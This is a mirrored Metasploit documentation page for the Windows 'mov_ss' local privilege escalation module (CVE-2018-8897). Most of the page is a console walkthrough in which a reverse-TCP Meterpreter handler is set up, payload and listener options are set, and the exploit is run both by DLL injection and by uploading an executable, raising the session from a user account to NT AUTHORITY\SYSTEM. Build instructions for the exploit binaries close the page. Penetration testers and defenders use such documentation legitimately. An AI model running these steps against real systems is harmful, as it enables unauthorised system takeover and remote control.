CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/windows/local/mov_ss.md
Views: 1904

Description

This module exploits a MOV SS vulnerability that is specifically made against Microsoft Windows (except for Windows XP).

Depending on the value of USE_INJECTION It will either inject a dll with the exploit code into a process, or it will upload a pre-compiled exploit onto the target machine, followed by the final payload (such as a Meterpreter) in order to gain remote code execution.

Vulnerable Target

Please note that this module may not work with certain hypervisors (such as VMWare). You should test it on a real machine if possible.

Verification Steps

msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.135.111:4567
[*] Sending stage (206403 bytes) to 192.168.136.142

meterpreter > getuid
Server username: DESKTOP-QGIC71I\msfuser
meterpreter > sysinfo
Computer        : DESKTOP-QGIC71I
OS              : Windows 10 (Build 16299).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > use exploit/windows/local/mov_ss
msf5 exploit(windows/local/mov_ss) > show options

Module options (exploit/windows/local/mov_ss):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   EXECUTE_DELAY  3                no        The number of seconds to delay before executing the exploit if USE_INJECTION=false
   EXPLOIT_NAME                    no        The filename to use for the exploit binary if USE_INJECTION=false (%RAND% by default).
   PATH                            no        Path to write binaries if if USE_INJECTION=false(%TEMP% by default).
   PAYLOAD_NAME                    no        The filename for the payload to be used on the target host if USE_INJECTION=false (%RAND%.exe by default).
   SESSION        1                yes       The session to run this module on.
   USE_INJECTION  true             yes       Use in-memory dll injection rather than exe file uploads.


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.135.111  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows x64


msf5 exploit(windows/local/mov_ss) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/mov_ss) > set lhost 192.168.135.111
lhost => 192.168.135.111
msf5 exploit(windows/local/mov_ss) > set lport 4567
lport => 4567
msf5 exploit(windows/local/mov_ss) > run

[*] Started reverse TCP handler on 192.168.135.111:4567
[*] Attempting to PrivEsc on DESKTOP-QGIC71I via session ID: 1
[*] Checking target...
[*] Attempting to PrivEsc on DESKTOP-QGIC71I via session ID: 1
[*] Target looks good... reflectively injecting exploit DLL and triggering exploit!
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (206403 bytes) to 192.168.136.142

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.136.142 - Meterpreter session 3 closed.  Reason: User exit
msf5 exploit(windows/local/mov_ss) > set USE_INJECTION false
USE_INJECTION => false
msf5 exploit(windows/local/mov_ss) > run

[*] Started reverse TCP handler on 192.168.135.111:4567
[*] Attempting to PrivEsc on DESKTOP-QGIC71I via session ID: 1
[*] Exploit uploaded on DESKTOP-QGIC71I to C:\Users\msfuser\AppData\Local\Temp\ACLgNJAJ.exe
[*] Payload (7168 bytes) uploaded on DESKTOP-QGIC71I to C:\Users\msfuser\AppData\Local\Temp\kWDncKCjHtb.exe
[*] Running exploit C:\Users\msfuser\AppData\Local\Temp\ACLgNJAJ.exe with payload C:\Users\msfuser\AppData\Local\Temp\kWDncKCjHtb.exe
[*] Sending stage (206403 bytes) to 192.168.136.142
^C[-] Exploit failed: Interrupt
msf5 exploit(windows/local/mov_ss) > sessions -l

Active sessions
===============

  Id  Name  Type                     Information                                Connection
  --  ----  ----                     -----------                                ----------
  1         meterpreter x64/windows  DESKTOP-QGIC71I\msfuser @ DESKTOP-QGIC71I  192.168.135.111:4567 -> 192.168.136.142:49696 (192.168.136.142)
  4         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ DESKTOP-QGIC71I      192.168.135.111:4567 -> 192.168.136.142:49699 (192.168.136.142)

msf5 exploit(windows/local/mov_ss) > exit

Build Instructions

For both the dll and exe, use Visual studio solutions found in ./external/source/exploits/cve-2018-8897 then copy the resulting binaries to ./data/exploits/cve-2018-8897